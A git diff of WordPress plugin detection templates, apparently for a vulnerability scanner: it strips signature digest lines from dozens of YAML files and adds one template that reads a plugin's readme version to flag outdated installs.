a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 0294a31b09..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206052789f348df99cfc82c80b5e74255f2402bbc07d6ed9a8b5cdf006673309de02200ef4fdd8eb6a2f0a8a122fd660a67cb8e5acc9355dfbf6cffac6476f80630c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 62e8c97008..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006493222ab3c0e8cd63537479f2f4acd9939ec86752412bd3c5cca27c9fc03f402210092a402a8067e704ecf3f175a60f9f9606a069b494b471202b6143a223c7167f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index ef28909193..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be79afae81a04b29c839636d125cc3f6b0653a945fa1e7fca5ce76b83cb78f56022100f9f5f6255b214d1688820f2d75e179712e98f2a4bad16a2f935afe2375e271ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 9354de6207..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004cf52ba5e8ae664be41ec07ae30517dddec9048111d703e1e40eac5a3c5c0a6022100f97166baa3feec56730bf056cc06753f6808726745112eb3e0a3b564fd1caf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 41766e5ebc..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e55e0b831151a4586fce3146817209a2a76fbcc69ec51d73e88e894db1371081022100aeb640da3e9d392f9384afd583df237a83be77adf479d0f6448465a8116c0fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 513ded8c8b..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbc55b075a08afe4e52efa72b9b25e760a3b70696ec60802dd320c8461cac22a022100d2cc5f73e71868ad7cbadad247d3a1d60191fbea9cf83be5cd35e9e4102fb047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml new file mode 100644 index 0000000000..4a3dcbd210 --- /dev/null +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -0,0 +1,48 @@ +id: wordpress-fluent-smtp + +info: + name: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/fluent-smtp/ + metadata: + plugin_namespace: fluent-smtp + wpscan: https://wpscan.com/plugin/fluent-smtp + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/fluent-smtp/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/fluent-smtp.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 336c12cad0..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb01feed0c635f91ee9fda72234ff3f227ab4ac7f780f24f8ccb66d608ea39a50220529bfc01e064943c7c9d7bc6175fed16218e46430bdb0b2a274fd3ea6f7f692d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index c55140c572..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029b90e468558d958779ec9e24ee53d7b6ffec1e7e3fc404f2abb08478b42a42c02201af3d1c18e1f395acdec8f59e0283c225044e7e6c61a06af895045277b89199d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 1a2b08a62e..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcdf130e841d81f576a8810bbf7b41fc44e6b8c411c57430970b13f463d039f5022072562aa4854269af9ba31b8a0af771e9c4490e68814d4525becd802f905aa6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index ca55eb1f5c..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1adf71fbef6a6028e22db0c865ecd2984dbaec35068c47d29386f1a2f7086a0022071737071c955eb0a710dc5959a116e0a6f3759381c37bd3fc6b1b44bd0abd51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index edc9bbe158..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012e06226839a4860e17cdf2aa5a8733f6a7ba763919983f2af79f5c9c86c45fa02206c8ab4122aeef31b451b255def594178301cafc9cd18ee543a202d85eb096777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 45230e9df8..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220321dcdb1a9836e39576c463a5e6b92efed5e9c7142df5bd7d8a4ea9e21207dab0220726e015dfc3891c36ce11f0bda4c193d03be49c25ed8acb6c3657ae874475458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index e963a15de6..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d05cc9fddd823566dc3cf99d8f578a9c71d276b3e33ab68cbcc43739facf284022100bb35fddabca52e6715716925568a88c2aa8f278b39c8e5e70da6d79936c74f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 05da4648d0..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008fb381bfd150785740795ae83a1f1338ff9c001bbddb5006d81b43bb3e08cbc70220792728ef927592029829592c7675b2d0f5c98e3fffbe2ae6756bdd7a4b191e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 420cf2768e..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d430a2505655390f80e3158b7d8ab0b4b0edadb735da377bb48acf5dd85d8a7802202c5690ba7be0e529503bb29ac4dd7326cf9e9c4c87cd4aff36b6a3014c36da60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index d7c3a0be2e..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e964749fc818a724cdd65df8809aa7a2555e5f200bf10a385f4a5f65ae79c6802200efee4eb4a2a444f8363a69d3bb7c7b30532c6e6352c06bc2f36ec4d06811acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index a6fbdf5fad..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009efcf610667fc510e75cc9e4d5b55d1c806f601a6e5207277c274b7f4a34ccdb0220644f5946293645ffbb76bbd3b1cc82a5d3af6c99544a0712f0dcaea2f46c7ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index e116d159f0..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d1fc2291e1d76700740d674eeeb10e60e0f0027a045c2dbbcaa6420f4e2cbcb0220138a5ee6f106d262693f929c5cca9e8a34618c8945bca09a1efbac7d61122825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index ac22216437..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe4a57a12aad1bfa3351a7ac84049f26eb0b0d90c71c62fd0c0d86c90b3dc45b022100f065114d9832d94d77eedbf135d4c5219ccb6afb44b1c1fab735642e93c1ad98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 49e2e708e2..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016e59e0e29263a4e26845ecd62b73df3cb43a2293bf0013192bac2d99cdebe0d022100a022bcf583a28a18b9f783c9b386f395eb163b6ed3cddeb3027a12aa80d00344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 81579cf8ef..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085394b19104204bfab3019418d98a59e7b1467e508c6206cb1860f527c3460eb02206b69946947cbf7887ab4528318c7c646eda7f3e18336f0cd17712cd08bc93a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 3256916ff3..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220288e816019f9a93e3422e223e8e0b7f91696a4d2af0250b9c77cc50114c04c3a022015b5b6161d3d20962d70586fe6207a4852a6ae5e7b2b6d4229de04b6e58ec944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 43008ee34d..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db485e98aae98b5fd1138be3bbc06e549ebaebc0b20269b72ebb85a5f9024a14022033e7de8b7a8615289b4ada552485970afca5806f39a6874a54750c78cc0a6227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f4239d0735..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210094b3421b420f16580725a50fa562721b64a25cd873d15394e861ba7829aa88d2022100a3e22010a3683b56ab1f64d843949c266b7dbd51eddad8303c1fec1f273b53e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 63f26b252c..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ef77e517470362fce6746c6ae729621b333a05cdf067deb04d40e612c50453602205055c3989acc269df34d303e5f5079f3bdbfb138e29c5e0e2956bc98c4bab4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index f1e02a2956..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddcaef2d87e57c47c1216fd27cec98d9789b28bec9db37801eac1bb1506c543c022017d5fa7c3f8840213d52e10cdb3f276f1cb3e79b9b30e66693d4560b2e900572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index bde2295840..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d6605b07075977d3bd1b9a4bad0af86ed3e6575dd71580f8f3306ed297e083ba022068aba7a8dded1caf600d44d88dba703cc6fe9338b12ea25ef06d369208fdcaa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8617cf9049..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1272624b74bf2f8bc7ab846343bb82d449c294222b2b0c7613a73a81b5afcc102206dc23ffaa70ef0cbcb7856a074c68285a38d42b23f288ddec5f270f6011968b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index dfe71e7462..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100892ffcec8a7591546a924b1d720b15cc9c973db07954b8fbbfc8237d175ed62c022100d1bb04d9baf28eba90b33cc7bee4d04b36ad9bb2b2a27afc6c8c198513640e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7db918b436..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095191f9fc71ab44568668159bcb4b1e29a21912bac45df9bb472a93d37a4f6ca022100ef2cf9d7a051ca955ed9f75da3c02d22c5365789b1fe7a544c31a68903845480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 08ca6203b4..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204641a9df585a95863682e43731d05b2007a5b369b418fcb10086b8c116a7a217022100e885efb86bcc81191420d9ffcbf5ffee92d186b3e4756c454eab29df1e908e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 55d496cfe1..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0fc0bc8c59a7a523d40d372ba9af53b6ededbeda4c019053218f5aad3eb523102206e1df7bf277afa03f81043a06caa23807e498eb2ae3a5d1b801819fc61400f92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 8233c89ab2..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0adc9141d3873b9b454c20a2db4ff091b7e71ea64e32fda03f6646b512a5fdd022100caf472dcfe300cf94b05e520d944cedfb4bee44e04d8b5ca405f5ae29077c69b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 6447d3e8f3..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac7dc92c83a7044ca278070350d0d2be1911a2e975af69e8b2e417536f1fd67702200804aca9fad9783503f0ac652954581666069a41d371646ed55a40ff97a35227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 1d6efb9b95..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abb1eebd29a989e78dfeca66560643d56ec84bd6cef5e708d31fd05bb370d4bd02202302b31adb9bff57793e239a20ae49beb422c88dffd874c3483ec2c271eeb3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 7c34558927..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9ecc0b88ef6e3778d519f5a72bdbc9cfb058bdc89eb8859bfe79311495585430220129aeee3093cbf4485bd3492aa16dd5cba2943cb16cacafb163f4fa2da234f02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 558e8cda87..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfe390a5958d1eb5b0295719d684cd26dfc86a81c085b8dac486a4d54268d20102205be5f76a791960e7deeae6082c45ba3bc60e5945a1024afb70625c68e20a70a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 42948cddfa..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038589d433bbde8dba0066c66ede206e58aef1c8605e62069f80d52bd491cf8e1022029e2a3bc6627e78f600a9383ba2e6074bd208f858e0ad1cd5bb18c8ac5080e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 9baca7acf1..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201514634e040466b369306f79c6cc5cda0d89594d6e52d8abddb7a8d259a979ab02203a08365feff0849dd46d4b20fcb5f1c66b3fa3d7e86205ef29fe133cdcd0704c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 97f5161cbf..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220594fa7bc5441f2f9461b8e174cd397eee18596727635e1d0831182e988293377022100b934c462dc4222866ff95d3a1d4f346b5bccbc3ec8454169e4fdae5b7735c4d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 88acb738a2..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220403df272bc3788fd0c82a59fabce74985e0459111b06423fa26b7c316bd2af85022013095d0e912ba3f21be104796fa98578827f05078dac47d726c050644ee6c79e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 4a1442cdbc..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bd24a16c2ba71071b5a6cc9a295f43297c22897d5b902a9ba062c7cd1ddc7f302201ef687cc2135df88bb04ab2424be598f76e8de5abf972c315ff3ece1602e72f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index d2baab7732..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d6de4cfd0f6047924d492d99571b6fac42528ab61ca36b541b016da8bf29382022100f3e7122babc1f1db5c77265814f0213df34bdbea4ce51e5ac60541daa8e0593e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 09b9ef33a2..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003574f2cfcb7ee0d3a68cd667d886767bfd7207003642cdc025cdaa138c5d931022028a331c4e502c93f528cb21ae41645672b977c1f35769f25a57bf03b1b052e18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 5385dda335..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202134d465cf635714d41472180159b96628bdd08b3018272e1b5b3ee49dddd820022100d694931c52a59abd7b2d69850027380054f6e301b29b09282fbe148b262d5406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 